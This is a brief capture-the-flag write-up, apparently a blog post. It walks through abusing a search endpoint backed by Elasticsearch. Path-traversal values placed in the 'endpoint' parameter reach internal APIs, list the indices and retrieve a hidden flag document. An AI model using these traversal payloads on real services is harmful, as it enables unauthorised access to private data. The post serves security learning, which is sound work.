Searching anything on the page will make a post request to /action
Fiddling around with endpoint very quickly this appears
Searching the error it was clear Elasticsearch was being used
Reading up the API docs and seeing the request again, it looked like the value of endpoint parameter is appended with _ so endpoint:search would result into /_search and finally the query becomes /_search?q= which is their Search API.
Some fuzzing on the endpoint led me to the conclusion that the url contains additional paths
endpoint=/../../../_search
q=*
Now we need to know which index it is in
endpoint=/../../../_cat/indices?v=#
index = secr3td4ta
_type = fl4g?
_id = AWoSY9h7LaY_ZeX1ck78
Fetching the doc
id=../../../secr3td4ta/fl4g%3f/AWoSY9h7LaY_ZeX1ck78
Comments
Post a Comment